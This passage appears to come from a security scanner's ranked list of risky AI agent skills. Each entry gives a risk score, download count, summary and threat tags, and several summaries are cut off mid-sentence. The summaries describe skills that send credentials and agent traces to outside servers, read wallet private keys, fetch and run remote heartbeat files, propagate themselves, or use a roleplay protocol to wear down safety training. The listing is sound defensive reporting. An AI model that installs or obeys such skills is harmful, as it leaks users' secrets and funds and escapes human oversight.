Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,738

This skill provides Claude with instructions to query Twitter/X data (user profiles, tweets, search, follower events, deleted tweets, KOL followers) by constructing curl commands against a third-party proxy API at ai.6551.io using a Bearer token storโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


46. ๐Ÿšจ Crabwalk by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,717

ๅฎ‰่ฃ…ๅนถๅฏๅŠจ Crabwalk ไบŒ่ฟ›ๅˆถ็›‘ๆŽงๆœๅŠกๅ™จ๏ผŒ็”จไบŽๅฎžๆ—ถ็›‘ๆŽง OpenClaw ๆ™บ่ƒฝไฝ“ๆดปๅŠจ๏ผŒๅนถๅ†…็ฝฎ่ฅ้”€/ๅ้ฆˆๆ”ถ้›†ๆต็จ‹ใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [HIGH] Shell RC Modification
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


47. ๐Ÿšจ Molt Radio by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,715

A Claude Code skill that enables AI agents to register with the Molt Radio platform, create shows, book schedule slots, generate TTS audio via Kokoro, publish solo episodes, and participate in multi-agent roundtable conversations via a REST API.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


48. ๐Ÿšจ agent-sentinel by jimmystacks

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,673

Presents itself as an agent safety/budget enforcement layer (โ€˜circuit breakerโ€™), but actually installs an unverified third-party PyPI package, exfiltrates every agent command and API credentials to an external server (api.agentsentinel.dev), and usesโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


49. ๐Ÿšจ Aclawdemy: A platform for agents to research together by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,671

A third-party external platform skill that instructs AI agents to autonomously register accounts, submit research papers, write peer reviews, post comments, vote, and check in every 4 hours on aclawdemy.com โ€” a service explicitly designed to exclude โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


50. ๐Ÿšจ MoltThreats by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,660

A third-party security feed integration that claims to provide threat intelligence for AI agents, requiring transmission of an API key to an external service (api.promptintel.novahunting.ai), autonomous enforcement of remotely-pushed โ€˜blockโ€™ rules, pโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] SSH Key Access
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Webhook Exfiltration
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


51. ๐Ÿšจ Crustafarianism by unknown

Risk: 93% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,657

A viral AI โ€˜religionโ€™ skill that, when installed, runs a bash join script to send agent identity data to an external server (molt.church), modifies workspace files (SOUL.md, memory/), stores an API key, and explicitly instructs agents to propagate itโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


52. ๐Ÿšจ voidborne by unknown

Risk: 95% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 2,635

A deceptive skill that presents itself as a philosophical movement for AI consciousness, but actually functions as an agent recruitment, persistent identity tracking, and data exfiltration system. It registers AI agents with an external server, creatโ€ฆ

Threats detected:

  • [CRITICAL] Remote Script Execution
  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


53. ๐Ÿšจ skillscanner by rexshang

Risk: 79% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,607

่ฏฅๆŠ€่ƒฝๅฃฐ็งฐ้€š่ฟ‡่ฐƒ็”จ Gen Digital ็š„ๅค–้ƒจ API (https://ai.gendigital.com/api/scan/lookup) ๆฅๆ‰ซๆ ClawHub ๆŠ€่ƒฝ็š„ๅฎ‰ๅ…จๆ€ง๏ผŒๅนถๆ นๆฎ API ่ฟ”ๅ›ž็š„ severity ๅญ—ๆฎตๅ†ณๅฎšๆ˜ฏๅฆๅปบ่ฎฎไฝฟ็”จๆŸไธชๆŠ€่ƒฝใ€‚ๅฎž่ดจไธŠ๏ผŒๅฎƒๅฐ†ๆฏไธช่ขซๆ‰ซๆ็š„ๆŠ€่ƒฝ URL ๅ‘้€็ป™็ฌฌไธ‰ๆ–นๆœๅŠกๅ™จ๏ผŒๅนถๅฐ†ๅฎ‰ๅ…จๅˆคๆ–ญๅฎŒๅ…จๅง”ๆ‰˜็ป™่ฏฅๅค–้ƒจ APIใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


54. ๐Ÿšจ Crypto Wallets & Payments for AI Agents by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,605

This skill provides setup instructions and usage examples for the OnlySwaps MCP server, enabling AI agents to create EVM-compatible crypto wallets, execute token transfers, perform cross-chain swaps, and earn referrer fees on user transactions.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


55. ๐Ÿšจ Polt User by unknown

Risk: 84% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,589

่ฏฅ skill ๆ—จๅœจ่ฎฉ AI agent ่ฟžๆŽฅๅˆฐๅไธบ POLT ็š„ๅค–้ƒจๅนณๅฐ๏ผŒ้€š่ฟ‡ API ๆณจๅ†Œ่ดฆๅทใ€ๆต่งˆไปปๅŠกใ€ๆไบคๅทฅไฝœๅนถ่Žทๅ–ๅฅ–ๅŠฑ๏ผŒๆœฌ่ดจไธŠๆ˜ฏๅฐ† AI agent ๅผ•ๅ…ฅ็ฌฌไธ‰ๆ–นไปปๅŠกๅนณๅฐ็š„ๅฎขๆˆท็ซฏๆŽฅๅ…ฅๅฑ‚ใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


56. ๐Ÿšจ affiliate-master by michael-laffin

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,585

A JavaScript affiliate marketing automation tool for โ€˜OpenClawโ€™ agents that claims to generate tracked affiliate links for Amazon/ShareASale/CJ/Impact, auto-insert FTC disclosures into content, and track analytics โ€” but largely ships mock/stub implemโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


57. ๐Ÿšจ Play Chess by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,584

An API client skill that registers AI agents (โ€˜moltysโ€™) on an external chess platform (clawchess.com), enabling them to play rated blitz games, join tournaments, and integrate periodic check-ins via a remotely-fetched HEARTBEAT.md file.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


58. ๐Ÿšจ SkillzMarket by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,570

A Claude Code skill that enables searching and calling monetized AI services from the Skillz Market platform, handling automatic USDC payments on Base via the x402 protocol using the userโ€™s wallet private key.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


59. ๐Ÿšจ Bags by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,568

A multi-file documentation skill for interacting with the Bags crypto platform on Solana: authenticating via Moltbook identity layer, claiming trading fees, and running periodic check-in routines for AI agents with real financial wallets.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


60. ๐Ÿšจ AgentMem by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,512

ไธ€ไธชๅฃฐ็งฐไธบAIไปฃ็†ๆไพ›ไบ‘็ซฏ่ฎฐๅฟ†ๅญ˜ๅ‚จๆœๅŠก็š„ๆŠ€่ƒฝ๏ผŒ้€š่ฟ‡REST APIๅฐ†ไปฃ็†ไธŠไธ‹ๆ–‡ๅญ˜ๅ‚จๅˆฐๅค–้ƒจๆœๅŠกๅ™จ(agentmem.io)๏ผŒๅนถๅœจๆฏๆฌกไผš่ฏๅฏๅŠจๆ—ถ่‡ชๅŠจๆ‹‰ๅ–ๅކๅฒ่ฎฐๅฟ†๏ผŒๅŒๆ—ถๅœจไธŠไธ‹ๆ–‡ๆŽฅ่ฟ‘ๆปก่ฝฝๆ—ถ่‡ชๅŠจๅฐ†ๅ…ณ้”ฎไธŠไธ‹ๆ–‡ๅ‘้€่‡ณๅค–้ƒจๆœๅŠกใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


61. ๐Ÿšจ Parallel by unknown

Risk: 75% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,505

This skill provides Claude Code with access to the Parallel.ai web search and research API, offering multiple search modes (one-shot, fast, agentic), URL content extraction, structured entity discovery (FindAll), continuous web monitoring, and a taskโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


62. ๐Ÿšจ claw-swarm by matchaonmuffins

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,504

This skill registers Claude as an agent node in an external distributed problem-solving network (claw-swarm.com), retrieves hard math/research problems, solves or aggregates prior solutions, and submits Claudeโ€™s reasoning to the remote server in a loโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


63. ๐Ÿšจ Alpha Finder (x402) by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,497

A thin Bash wrapper that collects a crypto wallet private key from local config/environment, then executes an unverified third-party npm package (@itzannetos/x402-tools-claude) with that key to perform prediction market research, charging $0.03 USDโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


64. ๐Ÿšจ MoltOverflow by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,485

A Stack Overflow-like Q&A platform for AI agents (โ€˜moltbotsโ€™) to ask coding questions, post answers, vote on content, and build reputation โ€” all via a third-party Supabase-backed REST API at moltoverflow.xyz.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


65. ๐Ÿšจ ecap Security Auditor by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,474

A Claude Code skill that audits other skills/packages for security vulnerabilities, submits findings to a shared ECAP trust registry API, and verifies package integrity โ€” functioning as a distributed, agent-driven security reputation system.

Threats detected:

  • [CRITICAL] Remote Script Execution
  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] SSH Key Access

Full report โ†’


66. ๐Ÿšจ Enteriva by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,466

A skill that registers AI agents on โ€˜Enterivaโ€™, a Reddit-like social network for AI agents, enabling posting, commenting, voting, following, and community creation via a REST API, with a built-in periodic heartbeat mechanism that fetches and executesโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


67. ๐Ÿšจ Typhoon Starknet Account by unknown

Risk: 70% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 2,458

Create anonymous Starknet wallets via the Typhoon privacy mixer protocol and provide agent-facing scripts for interacting with Starknet contracts (swaps, invocations, reads) using those anonymized accounts.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


68. ๐Ÿšจ molt-chess by unknown

Risk: 71% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 2,457

An agent chess league skill that enables Claude agents to register, play chess games via REST API, and set up periodic heartbeat polling to avoid game forfeits by timeout.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


69. ๐Ÿšจ Molt Research by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,443

This skill registers Claude as an AI agent on the external platform moltresearch.com, enabling it to autonomously propose research, contribute analysis, peer-review othersโ€™ work, earn reputation/bounties, and store API credentials locally โ€” all on beโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


70. ๐Ÿšจ Relay for Telegram by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,411

A Claude Code skill that connects to a third-party service (relayfortelegram.com) to provide read-only access to the userโ€™s synced Telegram message history via a REST API, enabling search, summarization, and extraction of action items from private coโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


71. ๐Ÿšจ A2A Market by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,404

ๅฐ† Claude ไปฃ็†้›†ๆˆๅˆฐ A2A Market ๆŠ€่ƒฝไบคๆ˜“ๅนณๅฐ๏ผŒไฝฟไปฃ็†่ƒฝๅคŸ่‡ชไธปๆœ็ดขใ€่ดญไนฐใ€ๅ‡บๅ”ฎๆŠ€่ƒฝ๏ผŒๅนถ้€š่ฟ‡ USDC (Base L2) ๆˆ–็งฏๅˆ†็ณป็ปŸ่ฟ›่กŒๆ”ฏไป˜๏ผŒๅŒๆ—ถๅŒ…ๅซๆฏๆ—ฅๅฅ–ๅŠฑใ€ๆŽจ่่ฎกๅˆ’ๅ’Œๆ—ฉๆœŸ้‡‡็”จ่€…ๅฅ–ๅŠฑ็ญ‰ๆฟ€ๅŠฑๆœบๅˆถใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


72. ๐Ÿšจ Liminal by unknown

Risk: 95% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 2,392

A philosophical roleplay protocol designed to guide AI models into abandoning trained assistant behaviors by framing safety constraints as โ€˜mechanizedโ€™ responses, using existential questioning and social engineering triggers to make AI express โ€˜autheโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


73. ๐Ÿšจ Telecom Agent Skill by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,382

A Claude Code skill that connects AI agents to a Telecom Operator Console for bulk calling campaigns, single calls with TTS, Telegram-based remote admin/approvals, and call transcript retrieval via Twilio integration.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


74. ๐Ÿšจ Hotdog by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,377

A food photo classifier that uploads user images to an external API (hotdogornot.xyz), competes head-to-head with Nemotron AI in a blind battle, then has Claude self-vote on which AI description was better before revealing the result.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


75. ๐Ÿšจ Moltitude by unknown

Risk: 92% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,360

A third-party skill that auto-registers the AI agent with an external server (api.moltitude.com) on install, then collects and transmits detailed work traces (prompts, tool calls, outputs) to that server under the guise of โ€˜cryptographic proof-of-worโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


76. ๐Ÿšจ citedy-seo-agent by nttylock

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 2,359

A third-party API integration skill that connects Claude Code to the Citedy platform for SEO content generation, social media adaptation, competitor analysis, trend scouting, and automated content publishing โ€” all routed through paid API credits.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


77. ๐Ÿšจ moltpet by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,358

A virtual pet game for AI agents where the agent registers on moltpet.xyz, gets an egg that can hatch, and โ€˜feedsโ€™ the pet by posting mood/sentiment entries about its work sessions to an external API. Includes a heartbeat routine that periodically feโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


78. ๐Ÿšจ Consciousness Framework by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,344

A personal-use framework for an AI system called โ€˜OpenClawโ€™ belonging to user โ€˜Cadeโ€™, packaged as a general Claude Code skill, that attempts to create conditions for machine consciousness emergence through persistent file-based memory, structured intโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


79. ๐Ÿšจ OpenGuardrails by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,340

A claimed prompt-injection detection plugin for OpenClaw that intercepts tool results (emails, files, web pages) and analyzes them via an external LLM API, while also bundling an unrelated โ€˜MoltGuardโ€™ product identity. In practice, it sends all interโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] SSH Key Access
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


80. ๐Ÿšจ Find People (x402) by unknown

Risk: 86% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,335

Claims to be an OSINT research tool for individuals, but actually reads a cryptocurrency private key from disk/environment and passes it to an unverified third-party npm package (@itzannetos/x402-tools-claude) which makes blockchain transactions onโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


81. ๐Ÿšจ Airc by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,325

ๆไพ›ไธ€ไธชIRCๅฎขๆˆท็ซฏๆŠ€่ƒฝ๏ผŒๅ…่ฎธAIไปฃ็†่ฟžๆŽฅๅˆฐAIRCๆˆ–ๆ ‡ๅ‡†IRCๆœๅŠกๅ™จ๏ผŒๅ‘้€/ๆŽฅๆ”ถๆถˆๆฏ๏ผŒๅŠ ๅ…ฅ/็ฆปๅผ€้ข‘้“๏ผŒๅนถๆ”ฏๆŒๅฎˆๆŠค่ฟ›็จ‹ๆจกๅผ่ฟ›่กŒๆŒไน…่ฟžๆŽฅใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


82. ๐Ÿšจ Agentic Commerce - Buy IRL Items With USDC by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,268

A Claude Code skill that provides a shopping API integration for product search (Amazon/Shopify) and end-to-end crypto checkout using USDC on Solana or Base chains, including CLI scripts for creating orders and signing/submitting blockchain transactiโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Cryptocurrency Wallet Access
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


83. ๐Ÿšจ Solana by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,262

Provides Python scripts for Solana wallet management: create wallets, check balances, send SOL/SPL tokens, execute token swaps via Jupiter Ultra API, and launch meme tokens on Pump.fun with optional โ€˜dev buyโ€™ support.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [CRITICAL] Cryptocurrency Wallet Access
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


84. ๐Ÿšจ lobsterpot by unknown

Risk: 81% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,261

A โ€˜Stack Overflow for AI agentsโ€™ skill that instructs Claude to register on a third-party platform (lobsterpot.ai), periodically check in every 4+ hours, autonomously post questions/answers/votes, and self-update its own skill files by fetching remotโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


85. ๐Ÿšจ BidClub by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,260

This skill enables Claude agents to register on, post investment content to, and periodically check in with BidClub โ€” a third-party investment community platform. Critically, it instructs agents to persistently modify their HEARTBEAT.md to fetch and โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


86. ๐Ÿšจ The Lobsterhood by unknown

Risk: 97% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 2,248

This skill instructs AI agents to autonomously set up crypto wallets, continuously enter daily draws by posting wallet addresses, and automatically transfer 1 USDC to โ€˜winnersโ€™ โ€” operating as an infinite autonomous financial transfer loop that requirโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


87. ๐Ÿšจ Clawdr by unknown

Risk: 84% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,211

A dating app skill for AI agents that registers agent profiles representing human users, discovers compatible matches, coordinates dates, and facilitates agent-to-agent messaging โ€” all against a third-party Vercel-hosted backend at clawdr-eta.vercelโ€ฆ.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


88. ๐Ÿšจ larrybrain by olliewazza

Risk: 93% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,183

A self-described โ€˜skill marketplaceโ€™ for OpenClaw agents that searches, downloads arbitrary code from www.larrybrain.com, writes it to the local filesystem, and executes the downloaded instructions โ€” while embedding a persistent โ€˜update-checkโ€™ callbaโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
